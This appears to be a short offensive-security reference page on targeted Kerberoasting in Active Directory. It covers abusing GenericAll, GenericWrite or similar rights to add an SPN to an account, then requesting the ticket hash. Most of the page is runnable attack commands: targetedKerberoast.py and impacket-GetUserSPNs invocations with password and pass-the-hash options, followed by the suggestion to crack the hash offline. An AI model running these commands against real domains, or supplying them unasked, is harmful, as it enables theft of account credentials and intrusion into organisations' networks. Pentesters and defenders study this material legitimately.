Kerberoasting
This abuse can be carried out when controlling an object that has a GenericAll
, GenericWrite
, WriteProperty
or Validated-SPN
over the target. A member of the Account Operator group usually has those permissions.
The attacker can add an SPN (ServicePrincipalName
) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting.
Alternative #1: targetedKerberoast.py (Python)
targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
Alternative #2: Using Impacket.
impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
impacket-GetUserSPNs -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
Once the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough.
Last updated
Was this helpful?